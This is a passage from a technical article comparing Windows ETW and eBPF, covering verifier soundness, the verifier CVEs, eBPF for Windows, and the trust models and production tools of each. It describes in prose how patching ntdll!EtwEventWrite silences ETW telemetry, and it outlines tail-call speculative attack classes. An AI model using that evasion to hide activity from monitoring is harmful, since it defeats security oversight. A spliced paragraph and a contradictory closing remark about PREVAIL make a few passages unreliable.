The v3 patch in the same series [@lore-kernel-org-4-astkernelorg] explains the structural reason: "To avoid the high cost of retpoline the attached BPF programs are called directly." kprobe goes through an indirect-jump dispatch, which on Spectre-mitigated kernels pays a retpoline penalty per call. The BPF trampoline replaces the indirect jump with a direct call patched in at attach time, eliminating that penalty entirely. The qualitative result is "practically zero overhead" relative to the function call itself. The exact numbers vary; the architectural reason does not.

Tail calls

bpf_tail_call(ctx, &prog_array, index) is a helper that, when the prog_array slot at index contains a loaded program, replaces the current program's execution context with the target program's. The architecture is documented in the Cilium BPF architecture reference [@docs-cilium-io-bpf-architecture], which describes the 33-call nesting ceiling: "This, too, comes with an upper nesting limit of 33 calls, and is usually used to decouple parts of the program logic, for example, into stages." The 33-call cap bounds the worst-case execution time of a chain that the verifier cannot symbolically follow (the destination is a runtime-resolved map slot, not a static call target). We will return to the security implications of tail calls in section 7.

Key idea: eBPF inverts the observability model. ETW asks the kernel "what happened?" eBPF asks the kernel "compute this and tell me the answer." The asymmetry is the reason a histogram of vfs_read lengths costs nothing on the wire under eBPF, and costs a fully formatted event per call under ETW.

eBPF is strictly more powerful than ETW: programmable filter, programmable aggregation, hooks everywhere. But that power has a cost that does not exist in ETW at all. The verifier.

5. The Verifier: Where Mathematics Meets the Kernel

May 2023. NIST publishes CVE-2023-2163 [@nvd-nist-gov-2023-2163]. The advisory describes the eBPF verifier in every Linux kernel since 5.4 quietly accepting programs it should have rejected: "Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafe code paths being incorrectly marked as safe, resulting in arbitrary read/write in kernel memory, lateral privilege escalation, and container escape." The fix was a small correction to a state-pruning heuristic. The lesson is bigger than the patch: no in-kernel verifier for a Turing-complete instruction set can be simultaneously sound, complete, and decidable. That is not a bug. It is a theorem.

Rice's theorem in the kernel

Alan Turing proved in 1936 that the halting problem is undecidable: no algorithm can decide, for every possible program, whether that program halts on every input. Henry Gordon Rice extended the result in 1953: any non-trivial semantic property of a program -- including memory safety, type safety, and bounded resource use -- is undecidable for the general case. The verifier has to decide a non-trivial semantic property: does this eBPF program access kernel memory only through valid pointers, with valid offsets, and terminate?

It cannot. Not in general. The verifier has to give up at least one of three properties:

Soundness -- never accept an unsafe program.
Completeness -- never reject a safe program.
Scalability -- run in polynomial time on real programs.

The halting problem is about a single property: termination. Rice's theorem generalizes the result to all non-trivial extensional properties -- any property that depends on what a program computes rather than how it is written. Memory safety on a Turing-complete instruction set is a non-trivial extensional property: there exist programs that are safe and programs that are unsafe. Rice's theorem says no decision procedure can correctly classify every program. Any real verifier must therefore be an *approximation* -- either it sometimes rejects safe programs (loss of completeness), sometimes accepts unsafe ones (loss of soundness), or runs out of resources on hard inputs (loss of scalability).

Jia and colleagues at HotOS 2023 [@sigops-org-papers-jiapdf] formalized this trilemma for in-kernel verifiers. The paper's title is the thesis: "Kernel Extension Verification Is Untenable." The authors argue that any verifier for a kernel extension language with the expressiveness of eBPF must trade off at least one of the three properties, and that real verifiers ship by trading all three approximately.

Kernel Extension Verification Is Untenable. -- Jia et al., HotOS 2023, `sigops.org/s/conferences/hotos/2023/papers/jia.pdf` [@sigops-org-papers-jiapdf] flowchart TD A[Soundness -- never accept -- unsafe programs] B[Completeness -- never reject -- safe programs] C[Scalability -- polynomial time -- on real programs] A --- B B --- C C --- A X["No verifier can have -- all three on a -- Turing-complete ISA"] A -.-> X B -.-> X C -.-> X

The Linux verifier ships with all three approximately. PREVAIL, the verifier used by eBPF-for-Windows, ships with stronger soundness and weaker completeness. The two designs occupy different points on the triangle, and the difference shows up in production.

The Linux verifier

The kernel verifier documentation [@docs-kernel-org-bpf-verifierhtml] describes the algorithm:

"The safety of the eBPF program is determined in two steps. First step does DAG check to disallow loops and other CFG validation. ... Second step starts from the first insn and descends all possible paths. It simulates execution of every insn and observes the state change of registers and stack."

The state the verifier tracks is a register-state lattice. Each register holds a type from a finite set: PTR_TO_CTX (a pointer to the program's context argument), PTR_TO_MAP_VALUE (a pointer into a map entry), PTR_TO_MAP_VALUE_OR_NULL (the return type of bpf_map_lookup_elem, which can be null), SCALAR_VALUE (an integer with min/max range), and so on. Each register also has a min/max range that tightens at every operation.

The kernel-side static analyzer that proves termination and memory safety of every eBPF program before load. The Linux verifier is documented at `docs.kernel.org/bpf/verifier.html` [@docs-kernel-org-bpf-verifierhtml]. It uses a register-state lattice plus min/max range tracking and explores all reachable program paths with state pruning to keep the cost manageable.

Consider the canonical pattern: look up a map value, check for null, dereference. Every eBPF tracing program does some version of this.

struct value *v = bpf_map_lookup_elem(&map, &key);   // r0 := PTR_TO_MAP_VALUE_OR_NULL
if (!v) return 0;                                    // branch on r0 == 0
return v->field;                                     // deref r0 + offset(field)

The verifier traces both branches. On the taken branch (r0 == 0), the type stays nullable, and the program returns. On the not-taken branch, the verifier refines the type from PTR_TO_MAP_VALUE_OR_NULL to PTR_TO_MAP_VALUE -- the null qualifier is gone, the dereference is bounds-checked against the map's value size, and the program is accepted.

This refinement is exactly the thing that broke in CVE-2023-2163. The bug was not in the dereference logic; it was in the state pruning that keeps the verifier's exploration tractable. Once the verifier has visited a program point with a given abstract state, it prunes subsequent visits from different predecessors with "the same" state. CVE-2023-2163 was a case where the pruner's notion of "the same state" was narrower than the predecessor's true state. The verifier accepted a program in which a register's true type at a join point did not match the type the verifier had pruned against. The program ran with hidden type confusion. Kernel arbitrary read/write followed.

PREVAIL, the abstract-interpretation verifier

PREVAIL [@github-com-ebpf-verifier], published by Gershuni and colleagues at PLDI 2019 [@vbpf-github-io-prevail-paperpdf], takes a structurally different approach. Where Linux's verifier is a heuristic abstract interpreter with a discrete type lattice, PREVAIL uses numerical abstract interpretation over the zone domain plus intervals.

A general framework for static analysis, introduced by Patrick and Radhia Cousot in 1977. The analyzer computes over an *abstract domain* -- intervals, zones, polyhedra, octagons -- rather than concrete program states. A safe abstract operation must over-approximate every possible concrete behavior. The soundness of the analysis reduces to the soundness of the abstract domain operations, which can be proved once and reused.

In the zone domain, the abstract state can express relational constraints between registers and memory base addresses -- not just "register r0 is in [base, base + size)" but "r0 - map_base is in [0, value_size)." That extra expressiveness is what lets PREVAIL prove pointer-arithmetic safety more directly than the Linux verifier's case enumeration. Walking the same null-check program:

Program point	Linux verifier (register lattice)	PREVAIL (zone domain)
After `bpf_map_lookup_elem`	`PTR_TO_MAP_VALUE_OR_NULL`	r0 in {0} U [base, base+sz)
Taken branch (r0 == 0)	refined to NULL	r0 = 0 (equality)
Not-taken branch	`PTR_TO_MAP_VALUE` (qualifier dropped)	r0 - base in [0, sz)
At deref `v->field`	bounds-checked deref	r0 - base in [off, off+access)

Both verifiers accept the program. The difference is in the proof strategy. Linux's verifier reasons case-by-case over a finite lattice; PREVAIL reasons numerically over an abstract domain whose soundness is proved once and reused. The PREVAIL paper (Gershuni et al., PLDI 2019) [@vbpf-github-io-prevail-paperpdf] showed that the zone-domain approach is sound and runs in polynomial time per fixed abstract domain.

flowchart LR A["r0 := bpf_map_lookup_elem"] B{"r0 == 0?"} C["return 0"] D["return r0->field"] A --> B B -- yes --> C B -- no --> D A -. "Linux: PTR_TO_MAP_VALUE_OR_NULL -- PREVAIL: r0 in {0} U [base, base+sz)" .-> A C -. "Linux: NULL -- PREVAIL: r0 = 0" .-> C D -. "Linux: PTR_TO_MAP_VALUE -- PREVAIL: r0 - base in [0, sz)" .-> D

The trade-off is concrete. PREVAIL accepts a broader class of programs the Linux verifier rejects (some bounded loops, some longer programs), and rejects others the Linux verifier accepts (Linux's heuristic pruning is more aggressive than zone-domain reasoning in some patterns). The contrast is a trade, not a strict ordering. Each verifier is sound with respect to its own abstract domain. The Linux verifier's CVE history is what happens when the domain itself is implemented heuristically rather than from a once-and-for-all soundness proof. The work of Paul Chaignon [@pchaigno-github-io-ebpf-verifierhtml] walks through the architectural differences in more detail.

Four CVEs, one pattern

The Linux verifier has shipped four widely-disclosed soundness bugs, each one a case where the verifier accepted a program it should have rejected.

CVE	Year	Subsystem at fault	Class
CVE-2020-8835 [@nvd-nist-gov-2020-8835]	2020	32-bit register bounds tracking	Out-of-bounds read/write
CVE-2021-3490 [@nvd-nist-gov-2021-3490]	2021	ALU32 bitwise-op bounds tracking	Out-of-bounds R/W, arbitrary RCE
CVE-2022-23222 [@nvd-nist-gov-2022-23222]	2022	`*_OR_NULL` type-state tracking	Local privilege escalation via type confusion
CVE-2023-2163 [@nvd-nist-gov-2023-2163]	2023	Branch-pruning logic	Arbitrary kernel R/W

The CVE-2020-8835 NVD entry describes a flaw where the verifier "did not properly restrict the register bounds for 32-bit operations, leading to out-of-bounds reads and writes in kernel memory." CVE-2021-3490, also reported on the NVD, identifies the same class of bug in the bitwise-operation paths. The CVE-2022-23222 record is tracked across the SUSE bug [@bugzilla-suse-com-showbugcgi], Debian DSA-5050 [@debian-org-dsa-5050], and the openwall oss-security disclosure thread [@openwall-com-13-1].

Note: All four CVEs are the same shape: the verifier's abstract state at some program point was narrower than the program's true reachable state, so the verifier proved a property that did not hold. Each fix tightened the abstract operation that introduced the narrowing -- range-tracking for the 2020 and 2021 bugs, type-state for 2022, branch pruning for 2023. None of the fixes were "fix the runtime"; they were all "fix the static analysis." That is exactly the shape Rice's theorem predicts: a heuristic abstract interpreter that occasionally drops information at a join point.

Key idea: The verifier is a research-grade static analyzer running as kernel code. When it gets the abstract domain wrong, the safety guarantee is a CVE. ETW does not have this failure mode because ETW does not run user-supplied code in the kernel.

ETW has driver signing as its safety mechanism. eBPF has the verifier. Microsoft's eBPF-for-Windows project asked an interesting question: what if you want both?

6. eBPF for Windows: The Convergence

On May 10, 2021, Dave Thaler of Microsoft published a blog post announcing a new project. The opening line is the kind of announcement that sounds modest and is not:

"Today we are excited to announce a new Microsoft open source project to make eBPF work on Windows 10 and Windows Server 2016 and later." -- Dave Thaler, "Making eBPF work on Windows" [@cloudblogs-microsoft-com-on-windows], Microsoft Open Source Blog, May 2021

The promise was a near-source-compatible eBPF surface on NT, so that programs and toolchains written for Linux eBPF -- libbpf, bpftool, BCC, clang -target bpf -- would work on Windows with minimal change. The architectural surprise, visible only once you read the design docs, is that the Linux design does not port directly. The Windows trust model is different. The Windows code-integrity story is different. The choices Microsoft made reveal which parts of eBPF are genuinely portable and which parts are deeply Linux-shaped.

Three execution modes

The microsoft/ebpf-for-windows README [@github-com-for-windows] decomposes the runtime into three modes:

Native eBPF program (preferred, HVCI-compatible). PREVAIL verifies the bytecode in user mode. On success, the bpf2c [@github-com-bpf2ctests-expected] tool transliterates each verified BPF instruction to equivalent C, MSVC compiles the C, and the result is a signed .sys kernel driver. The signed driver is what gets loaded into the kernel.
JIT compiler. A user-mode service (eBPFSvc.exe) calls the uBPF [@github-com-iovisor-ubpf] JIT to produce x64 or ARM64 native code, loaded into the kernel-mode execution context. Disabled on HVCI hosts because dynamic code generation cannot be SiPolicy-signed.
Interpreter. uBPF's interpreter, debug-only.

The native mode is the architecturally interesting one. It treats eBPF bytecode as a source language for a signed-driver compile, not as a target for a kernel-mode JIT. The choice is forced by Windows' kernel-mode security model.

A Windows feature that uses the hypervisor to enforce that only signed code runs in kernel mode. With HVCI on, the kernel will refuse to execute any page that does not match a Code Integrity policy signature. Dynamic code generation -- the kind a JIT does -- is impossible on an HVCI host unless the JIT itself is privileged to bless the pages it produces.

bpf2c: the literal transliterator

The thing that makes the native pipeline work is bpf2c. It takes verified eBPF bytecode and emits portable C that any modern compiler can build into a kernel driver. The transliteration is one bytecode instruction per C statement. A concrete excerpt from droppacket_raw.c [@raw-githubusercontent-com-expected-droppacketrawc], the expected output for the XDP-class droppacket.c [@github-com-sample-droppacketc] sample, shows the shape:

{` // Excerpt from microsoft/ebpf-for-windows // tests/bpf2c_tests/expected/droppacket_raw.c // One verified BPF instruction maps to one C statement.

#pragma code_seg(push, "xdp") static uint64_t DropPacket(void* context, const program_runtime_context_t* runtime_context) { uint64_t stack[(UBPF_STACK_SIZE + 7) / 8]; register uint64_t r0 = 0; register uint64_t r1 = 0; // ... r2 .. r6, r10 declarations ...

// EBPF_OP_MOV64_REG pc=0 dst=r6 src=r1 offset=0 imm=0 r6 = r1; // EBPF_OP_MOV64_IMM pc=1 dst=r1 src=r0 offset=0 imm=0 r1 = IMMEDIATE(0); // EBPF_OP_STXDW pc=2 dst=r10 src=r1 offset=-8 imm=0 WRITE_ONCE_64(r10, (uint64_t)r1, OFFSET(-8));

// ... one C statement per verified BPF instruction ...

r0 = runtime_context->helper_data[0].address(r1, r2, r3, r4, r5, context); } `}

The eBPF-for-Windows transliterator from verified BPF bytecode to portable C suitable for MSVC compilation. The output is a signed-driver source file, one C statement per BPF instruction, that can be compiled and signed through the same pipeline as any other kernel driver. The golden test corpus lives at `microsoft/ebpf-for-windows/tests/bpf2c_tests/expected` [@github-com-bpf2ctests-expected].

Four things stand out in the excerpt. One BPF instruction maps to one C statement; the // EBPF_OP_* comments name the opcode, and the line below it is the equivalent C. The eBPF VM's eleven registers become eleven C uint64_t locals; MSVC's optimizer assigns them to native registers in the final .sys. The #pragma code_seg(push, "xdp") directive names the program section the same way SEC("xdp") does on Linux. And helper calls dispatch through a runtime table -- runtime_context->helper_data[0].address(...) -- so the signed driver remains portable across helper-ABI changes.

The result is a kernel module that is a signed driver in every Windows sense of the term: HVCI checks pass, Kernel Mode Code Integrity (KMCI) [@learn-microsoft-com-downloads-sysmon] is satisfied, the Authenticode chain validates. eBPF-for-Windows native mode does not invent a new in-kernel trust boundary. It composes with the one Windows already has.

flowchart LR A["Restricted C source"] B["clang -target bpf"] C["BPF bytecode"] D["PREVAIL verifier -- (user mode)"] E["bpf2c -- transliterator"] F["Portable C"] G["MSVC compile"] H["Signed .sys driver"] I["Windows kernel -- (HVCI / KMCI)"] A --> B --> C --> D --> E --> F --> G --> H --> I

The verifier moved

The most consequential architectural choice in eBPF-for-Windows is not visible in the binary. PREVAIL does not run inside the kernel. It runs inside the user-mode eBPFSvc.exe service, which orchestrates verification and the subsequent compile-and-sign pipeline. The kernel never sees an unverified BPF program. By the time anything enters the kernel, it is either a signed driver (native mode) or a JIT-produced buffer that has already passed verification in user space (JIT mode, on non-HVCI hosts).

This is a deliberate divergence from Linux. Linux runs its verifier inside the kernel because the kernel is the only place that can prevent unprivileged user space from loading unsafe programs. Windows can move the verifier out of the kernel because the kernel-mode trust boundary -- the thing that can run -- is already protected by code signing. The verifier becomes a correctness check rather than a safety check at the kernel boundary; safety at the boundary is enforced by HVCI.

Hook coverage as of 2026

The hook surface on Windows is narrower than Linux's. As of 2026, eBPF-for-Windows exposes XDP-class network hooks, BIND, SOCK_OPS, SOCK_ADDR, and process-creation and process-exit hooks via Windows Filtering Platform callouts plus a process hook surface. There is no full kprobe surface. There are no LSM-equivalent hooks. The project README [@github-com-for-windows] labels itself "work-in-progress." The networking-subset claim in this article is not marketing softening; it is the actual hook list.

The naive model of cross-OS eBPF says: same bytecode runtime, runs on both kernels. The actual model is more subtle and more interesting.

The bytecode is portable because both verifiers accept the same instruction encoding, now standardized at IETF as RFC 9669 [@rfc-editor-org-rfc-rfc9669html]. The verifier is portable because PREVAIL is an abstract interpreter that does not depend on Linux-specific kernel data structures. The runtime is not portable: Linux runs verified bytecode through its in-kernel JIT; Windows transliterates verified bytecode to C and compiles it into a signed driver.

So the cross-platform abstraction is the verifier, not the runtime. PREVAIL is the contract; each OS lifts verified bytecode into its own trust model. Linux trusts the verifier's output enough to JIT it in kernel mode; Windows distrusts in-kernel dynamic code by policy and lifts the verified bytecode out through a signed-driver compile. The portability boundary moved from "same VM" to "same static analysis," and that is the architectural insight that makes the project work.

Key idea: The runtime is not the cross-platform abstraction. The verifier is. PREVAIL is the contract; each OS lifts verified bytecode into its own trust model -- in-kernel JIT on Linux, signed-driver compile on Windows. eBPF-for-Windows is not "same kernel hook, different OS"; it is "same bytecode contract, different OS-specific lifting."

Cross-OS eBPF works for the networking subset today. The general kernel observability case -- arbitrary kprobes, full LSM hooks, deep process introspection -- is still Linux-only because the hooks themselves are Linux-internal. eBPF-for-Windows is a real convergence, but it is a subset convergence. Section 7 zooms out and compares the two designs across the full set of dimensions practitioners actually use to choose.

7. Head-to-Head: Performance and Trust Models

Two designs. One emits, one computes. Practitioners need to know what each one costs, where each one's edges cut, and what attack classes each design enables. The right form for that comparison is a table.

Dimension	ETW	Linux eBPF	eBPF for Windows	DTrace
In-kernel filter language	None (level + keyword mask only)	Verified bytecode	Verified bytecode	D scripting language
In-kernel aggregation	None	Maps (per-CPU and shared)	Maps	Aggregations primitive
Producer per-event cost	Constant: format + memcpy to per-CPU buffer	JIT-compiled native code at hook	JIT or signed-driver call at hook	Probe handler call
Verifier	Driver signing only	Linux in-kernel heuristic verifier	PREVAIL in user mode + KMCI	None (D is interpreted, safe-by-construction)
Verifier soundness incidents	Not applicable	4 widely-disclosed CVEs (2020-2023)	None disclosed	None
Hook coverage	Universal across Windows API surface	Universal: kprobe, uprobe, tracepoint, XDP, TC, LSM, sched	XDP, BIND, SOCK_OPS, SOCK_ADDR, process	Solaris/BSD/macOS provider set
Cross-platform	Windows only	Linux only	Source-compatible with Linux subset	Solaris, FreeBSD, macOS (legacy)
Transport	Per-CPU ring buffer, .etl files	Ringbuf, perf_event_array, maps	Ringbuf, maps	Per-CPU buffers
Trust model	Manifest registration + driver signing	Verifier + CAP_BPF + CAP_PERFMON	Verifier + HVCI + driver signing	Privilege check + safe-by-construction
Adoption pattern	Defender, Sysmon, CrowdStrike, SentinelOne, Carbon Black	Cilium, Falco, Tetragon, Tracee, Pixie, Sysmon for Linux	Pre-production; Azure test deployments	Solaris/macOS legacy + bpftrace via inspiration
Best suited for	Forensic capture across the entire Windows API surface	Hot-path filtering and aggregation with arbitrary kernel hooks	Cross-platform networking observability	Interactive debugging on Solaris-lineage systems

The asymptotic argument

Two designs can be compared asymptotically. ETW carries N events of average size S; the kernel-to-user wire cost is Omega(NS) -- the unavoidable lower bound for streaming N events. eBPF can reduce that to O(M) where M is the aggregation size, for workloads that aggregate before the events cross the boundary. The bpftrace histogram from section 4 is the concrete example: vfs_read can fire ten million times per second while the user-side bandwidth is zero, because the per-CPU histogram never crosses the boundary until print time.

The asymmetry is the entire reason eBPF makes sense for high-frequency telemetry. It is also the reason every cloud-native observability tool from 2018 onward is on eBPF. When the producer rate exceeds the user-space consumption rate, you do not have a choice: you either drop events or aggregate them in-kernel. ETW can drop. Only eBPF can aggregate.

The tail-call attack class

bpf_tail_call(ctx, &prog_array, index) is powerful and its power has structural consequences. From the BPF trampoline v3 cover letter [@lore-kernel-org-1-astkernelorg-2], the kernel team is explicit that the trampoline was designed in part as a replacement for tail-call-based chaining: "In many cases it can be used as a replacement for bpf_tail_call-based program chaining." The motivation is structural -- there are three attack classes implicit in the tail-call mechanism, and the trampoline avoids them.

Branch-target injection on the tail-call dispatcher. Pre-mitigation kernels exposed an indirect branch from kernel mode -- the dispatcher selecting its target from a user-controllable prog_array index. That is exactly the shape of a Spectre-v2 gadget. Mitigation: retpolined dispatcher and the BPF trampoline replacement that avoids the indirect branch entirely.The qualitative reason fentry beats kprobe is not a benchmark; it is the avoidance of a retpoline. The v3 patch cover letter spells this out: "To avoid the high cost of retpoline the attached BPF programs are called directly." Real numbers vary by microarchitecture, retpoline implementation, and the rest of the kernel-build configuration, but the structural reason is the same on every machine.

Recursion-bound bypass. The 33-call cap protects the verifier's termination proof for a single program from being bypassed by chaining, but it is a per-execution counter. A sequence of attached programs at different attach points can still produce arbitrary aggregate work. The mitigation lives in per-event scheduling, not in the verifier.

Speculative type confusion. The verifier proves a single program's register-type invariants. The target of a tail call is selected at runtime from a map, so speculative execution can execute a different program under the calling program's type-state. Mitigation: indirect-call hardening shared with the rest of the kernel.

flowchart LR A["Calling BPF program"] B["bpf_tail_call(ctx, &arr, idx)"] C["JIT dispatcher -- (indirect jump)"] D{"Map slot at idx"} E["Target BPF program"] F["Speculative path -- (wrong target)"] G["Retpoline / BPF trampoline -- (direct call)"] A --> B --> C --> D D -- correct --> E D -. speculative .-> F G -. mitigation .-> C

The ETW user-mode bypass

ETW has its own structural attack class, mentioned in section 3 and worth restating in the trust-model context. A process that wants to silence its own ETW emissions can patch ntdll!EtwEventWrite to a ret instruction in its own address space. The kernel buffer never sees the event. EDR vendors monitor for this integrity violation out of band, and use the patch itself as a high-confidence detection signal.

Note: ETW's emission path runs in the calling process's own address space. A process that wants to hide its activity can patch the ntdll!EtwEventWrite thunk to ret, silencing emissions before they reach the kernel buffer. EDR vendors monitor for this integrity violation out of band, and treat the patch as a detection in its own right. The deeper question is whether any user-mode emission primitive can be tamper-resistant under hostile user-mode code. The current answer is "no": the mitigation has been to move the trust boundary into the kernel, via PPL, the kernel-only Threat-Intelligence provider, and (on Linux) LSM hooks that observe mprotect and image-load operations directly.

Trust models, side by side

ETW trusts manifest registration plus Code Integrity for kernel drivers. The kernel only emits events; the only adversary-controllable surface is the user-mode provider, and the integrity-violation tell catches the obvious attack.

Linux eBPF trusts the verifier plus CAP_BPF and CAP_PERFMON. The verifier is the kernel-mode safety boundary; capabilities gate who can load programs at all. Both have been the source of soundness CVEs and exploitation paths. Defense in depth: unprivileged eBPF off by default since 5.16, hardening of the indirect-call dispatcher, ongoing verifier work.

eBPF for Windows trusts PREVAIL plus HVCI driver signing. The verifier runs in user mode; the kernel only ever sees a signed driver or a JIT-emitted buffer that has already passed the verifier. The composition is strictly more conservative than Linux eBPF, because it stacks the verifier on top of the signing model rather than replacing it. Microsoft is using the Windows kernel-mode trust mechanism and adding the eBPF verifier to it, not choosing between them.

The next layer up from the kernel substrate is the consumer layer -- the agents and SIEM pipelines practitioners actually ship. That production stack is what determines which substrate practitioners reach for first.

8. Production Adoption: The Agent Layer

The substrate matters because the consumer stack does. On Linux, eBPF is the foundation of every serious cloud-native security and observability project. On Windows, ETW is the same. The portable subset is small but real, and it is growing.

The Linux side

Cilium [@cilium-io] is the dominant eBPF-based networking project, CNCF-graduated [@falco-org-docs] and shipping Kubernetes cluster networking, NetworkPolicy enforcement, and a service mesh implementation. Falco [@falco-org], originally created by Sysdig and now CNCF-graduated, provides eBPF-based runtime threat detection driven by a rules engine. Tetragon [@tetragon-io-docs-overview], a Cilium subproject, attaches eBPF programs to kprobes and LSM hooks for in-kernel enforcement -- not just observation but the ability to block. Tracee [@github-com-aquasecurity-tracee] from Aqua Security is an eBPF runtime security tool. Pixie [@docs-px-dev], originally Pixie Labs and now under New Relic, uses eBPF for auto-instrumentation of services running in Kubernetes.

Sysmon for Linux [@github-com-microsoft-sysmonforlinux] is the most architecturally interesting member of the list. Microsoft, the company that built ETW and Sysmon, ported Sysmon to Linux by replacing the ETW back end with eBPF kprobes via the SysinternalsEBPF library. The XML configuration schema and Event IDs are preserved, so SOC analysts see the same channel from either OS. It is the production demonstration that ETW and eBPF can be made surface-equivalent to a consumer.

The Windows side

Sysmon [@learn-microsoft-com-downloads-sysmon] is the canonical ETW consumer reference design, authored by Mark Russinovich and Thomas Garnier and free from Microsoft. Microsoft Defender for Endpoint [@learn-microsoft-com-defender-endpoint] is the commercial Microsoft EDR product, ETW-driven and cloud-connected. CrowdStrike Falcon, SentinelOne, and Carbon Black are the major third-party EDRs, all built on ETW. krabsetw [@github-com-microsoft-krabsetw] is Microsoft's C++ ETW consumer library; the Microsoft.Diagnostics.Tracing.TraceEvent package is the .NET equivalent.

The toolchain layer

The eBPF world comes with a toolchain that does not have a direct ETW counterpart. libbpf [@github-com-libbpf-libbpf] is the canonical C library for loading and managing eBPF programs. bpftool [@github-com-libbpf-bpftool] is the inspection utility. BCC [@github-com-iovisor-bcc] is the older Python-binding toolkit. bpftrace [@github-com-iovisor-bpftrace] is the DSL inspired by DTrace. cilium/ebpf [@github-com-cilium-ebpf] is the Go library; aya [@github-com-rs-aya] and libbpf-rs [@github-com-libbpf-rs] are the Rust libraries. The toolchain coverage tells you something about the substrate: a Go developer can write an eBPF program and have it loaded by their existing service binary, because the load-verify-attach lifecycle has a Go binding.

ETW has its own toolchain -- tracerpt.exe, Windows Performance Analyzer, BenchmarkDotNet, krabsetw -- but the toolchain is shaped around consuming events, not around emitting programs into the kernel. The asymmetry of the toolchains mirrors the asymmetry of the substrates.

The decision guide

**Windows EDR or building on Microsoft Defender for Endpoint.** Use ETW plus Sysmon plus the `Microsoft-Windows-Threat-Intelligence` provider. eBPF for Windows is not yet a substitute for Defender-grade kernel telemetry; the hook surface is too narrow.

Linux runtime-security or cluster networking. Use eBPF. Pick libbpf or cilium/ebpf for the language binding. Attach LSM hooks for enforcement; fentry for observability. The verifier will fight you; that is expected.

Cross-platform networking observability with one source surface. Use eBPF for Windows and Linux eBPF together, restricted to the XDP, SOCK_ADDR, SOCK_OPS, and BIND hooks. The Linux source compiles unchanged on Windows for this subset.

Forensic capture across the full Windows API surface. Use ETW into .etl files, analyzed in Windows Performance Analyzer. Nothing else covers that breadth on Windows.

Note: The Sysmon-for-Linux case study is the cleanest practical justification for the abstract-surface convergence. If your SIEM consumes Sysmon XML and matches on Event ID and field, you can run a fleet of Windows hosts on ETW and Linux hosts on eBPF and the SIEM will not know the difference. The substrate is invisible at the consumer's contract; what matters is that the contract is preserved across the back-end change. This is the production realization of the engineering pattern -- different mechanisms, identical schemas -- that the rest of the article has been describing in architectural terms.

The consumer stack has converged at the surface layer: XML configs, Event IDs, EDR vendor APIs. The substrate has not, and the open problems in the next section are what stands in the way.

9. Open Problems and the Frontier

What can we not do yet? Four open problems will shape the next five years of kernel observability.

9.1 Verifier-driven false rejection

Programs that PREVAIL and a human can both prove safe still get rejected by the Linux verifier, which returns the cryptic "verifier complexity limit reached" error. EDR vendors end up fighting the verifier rather than writing the program they want. The workarounds are real and ugly: __attribute__((noinline)) annotations to force the compiler to emit function boundaries the verifier can prune around, explicit bound assertions that re-derive properties the compiler already knows, bpf_loop() to externalize loops the verifier cannot trace. The HotOS 2023 thesis is exactly that this is not a bug -- it is a property of any heuristic verifier under the soundness-completeness-scalability triangle. The completeness leg is the one the Linux verifier gives up first, every time.

The frontier here is twofold. On one side, the verifier is becoming more capable: bounded loops, bpf_for_each_map_elem, kfuncs, and the trampoline-based attach mechanisms have all expanded what the verifier can prove. On the other side, PREVAIL's polynomial-time abstract-interpretation approach represents an alternative architectural lineage. Neither approach removes the underlying undecidability. Both make the rejection threshold higher.

9.2 Cross-OS eBPF ABI

The eBPF Foundation's RFC 9669 [@rfc-editor-org-rfc-rfc9669html], published as an IETF Independent Submission in October 2024, standardized the instruction set architecture for BPF programs. The RFC describes the 64-bit ISA, the encoding of instructions, the memory model, and the verifier's basic obligations. It is the cleanest cross-OS contract eBPF has ever had.

What the RFC does not standardize: helpers, map types, and hook semantics. Those remain Linux-defined-in-practice. The eBPF-for-Windows helper set is a subset, with extensions for Windows-specific concepts. The FreeBSD and illumos ports have their own subsets. A single observability agent that runs everywhere needs more than a standardized ISA; it needs a standardized helper API and a standardized hook taxonomy. Today, EDR vendors writing cross-OS agents ship two distinct programs that share a build system and not much else.

Note: RFC 9669 is the ISA standard. It defines what BPF bytecode looks like and what the verifier must check. It does not define which helpers a program can call, what the map types are, or what hooks the program can attach to. Those are the parts that vary between Linux, Windows, and the BSDs. Standardizing them is more of a committee problem than a research problem -- a meaningful subset is achievable; a full superset probably is not.

9.3 ETW evasion at the trust boundary

The user-mode EtwEventWrite patching attack class is roughly 2020-vintage but has not gone away. The kernel-emitted Microsoft-Windows-Threat-Intelligence provider is the current best mitigation: kernel signals cannot be patched from user mode, so an attacker who silences user-mode emissions still trips kernel-only signals on mprotect, image load, and remote thread creation.

The deeper structural question is whether any user-mode primitive can ever be tamper-resistant under hostile user-mode code. The short answer is no, which is why the answer keeps moving the trust boundary into the kernel -- through PPL, through LSM, through signed drivers. On Linux, the same pattern shows up: hostile-user-mode-resistant telemetry must run inside the kernel, which is why the LSM hooks are the part of the eBPF hook surface that matters most for EDR.

9.4 Hot-path overhead at scale

Production environments routinely run Falco, Cilium, and a vendor EDR on the same kernel, each attaching probes to the same hook. The marginal cost of an eBPF kprobe on a five-million-events-per-second syscall is not zero, and the cost compounds non-linearly when three different agents attach to the same hook with three different programs.

The current partial mitigations are real. fentry/fexit plus the BPF trampoline removed the per-attach trap-frame cost. kprobe.multi, added in Linux 5.18, lets a single program attach to multiple functions with one trampoline. BPF-link iteration lets one agent observe what another has attached. But none of these compose perfectly: three different vendors with three different agents end up with three different trampolines on the same function. The structural fix is trampoline sharing, and the implementation is attach-type-specific.The multi-agent attach problem is the eBPF version of a familiar systems issue: when N independent consumers each install their own instrumentation at the same point, the cost is N times the cost of one. Linux has solved this once for kprobes (with kprobe.multi) and is solving it again for the BPF trampoline. Whether the same pattern can be made cheap for fentry attaches across LSM hooks is an open implementation question.

The frontier of kernel observability is not "build a new substrate." It is "make the existing substrates compose under multi-tenant production load."

10. Two Generations

Return to the SOC analyst from section 1. The Sysmon Operational channel looks the same on both hosts. Now you know why -- and also why the similarity is a deliberate engineering choice rather than a coincidence.

ETW is mature, has full Windows coverage, is emission-only. It is a catalog of events. Every Windows subsystem registers a provider, every provider declares a manifest, every event has a stable schema. A consumer that knows the manifest knows what to expect. The trust boundary is the kernel-mode driver signing model. The cost is that aggregation, sampling, and filtering all happen in user space, after the event has crossed the boundary.

eBPF is programmable, has filter and aggregation in-kernel, has a verifier. It is a language for asking questions of the kernel, not a catalog of pre-defined answers. The trust boundary is the verifier, which is a research-grade static analyzer running as kernel code. Linux's verifier shipped four widely-disclosed soundness bugs in four years. PREVAIL trades that soundness leg for a more conservative completeness story. The trade-offs are not finished.

